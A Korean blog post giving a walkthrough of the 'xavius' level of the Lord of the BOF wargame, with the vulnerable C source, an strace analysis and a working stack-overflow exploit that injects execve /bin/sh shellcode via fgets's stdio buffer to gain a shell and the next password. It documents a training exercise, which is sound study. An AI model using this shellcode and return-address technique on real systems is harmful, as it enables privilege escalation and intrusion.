[nightmare@localhost nightmare]$ cat xavius.c
/*
The Lord of the BOF : The Fellowship of the BOF
- xavius
- arg
*/
#include <stdio.h>
#include <stdlib.h>
#include <dumpcode.h>
main()
{
char buffer[40];
char *ret_addr;
// overflow!
fgets(buffer, 256, stdin);
printf("%s\n", buffer);
if(*(buffer+47) == '\xbf')
{
printf("stack retbayed you!\n");
exit(0);
}
if(*(buffer+47) == '\x08')
{
printf("binary image retbayed you, too!!\n");
exit(0);
}
// check if the ret_addr is library function or not
memcpy(&ret_addr, buffer+44, 4);
while(memcmp(ret_addr, "\x90\x90", 2) != 0) // end point of function
{
if(*ret_addr == '\xc9'){ // leave
if(*(ret_addr+1) == '\xc3'){ // ret
printf("You cannot use library function!\n");
exit(0);
}
}
ret_addr++;
}
// stack destroyer
memset(buffer, 0, 44);
memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));
// LD_* eraser
// 40 : extra space for memset function
memset(buffer-3000, 0, 3000-40);
}
소스를 보고 뭘 어떻게해야하지 생각했는데 fgets에 뭔가 있겟다 싶어서 strace로 syscall을 추적해보았다
<c.f) strace >
http://www.joinc.co.kr/modules/moniwiki/wiki.php/man/1/strace
[nightmare@localhost /tmp]$ strace ./xavius
execve("./xavius", ["./xavius"], [/* 24 vars */]) = 0
brk(0) = 0x8049a58
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000
open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0
old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40015000
close(3) = 0
open("/lib/libc.so.6", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096
old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40018000
mprotect(0x40105000, 30812, PROT_NONE) = 0
old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0xec000) = 0x40105000
old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000
close(3) = 0
mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0
mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0
munmap(0x40015000, 12210) = 0
personality(PER_LINUX) = 0
getpid() = 762
fstat64(0, 0xbffff964) = -1 ENOSYS (Function not implemented)
fstat(0, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000
ioctl(0, TCGETS, {B9600 opost isig icanon echo ...}) = 0
read(0,
"\n", 1024) = 1
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000
ioctl(1, TCGETS, {B9600 opost isig icanon echo ...}) = 0
write(1, "\n", 1
) = 1
write(1, "\n", 1
) = 1
munmap(0x40016000, 4096) = 0
_exit(-1073746168) = ?
[nightmare@localhost /tmp]$
0x40015000에서 뭔가하는걸 알수 있엇다 풀고나서 찾아보니까 fgets가 사용하는 특수 버퍼라 한다 ..
[payload]
\x90 [10] | shellcode[24] | \x90[10 ] | RET(0x4001501) |
+)\x00이 들어가면 null 로 인식하기 때문에 NOP로 감싸주고 \x01로 넣어주었다
[attack]
[nightmare@localhost nightmare]$ (python -c 'print "\x90"*10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x90"*10+"\x01\x50\x01\x40"';cat) | ./xavius
??????????1픐h//shh/bin??S??
것??????????P@
my-pass
euid = 519
throw me away
성공
'과거의 컴퓨터 공부 > LOB(完)' 카테고리의 다른 글
| <LOB>完 (0) | 2014.09.03 |
|---|---|
| (LOB)level20.xavius (0) | 2014.09.02 |
| (LOB)level18.succubus (0) | 2014.08.25 |
| (LOB)level17.zombie_assassin (0) | 2014.08.25 |
| (LOB)level16.assassin (0) | 2014.08.25 |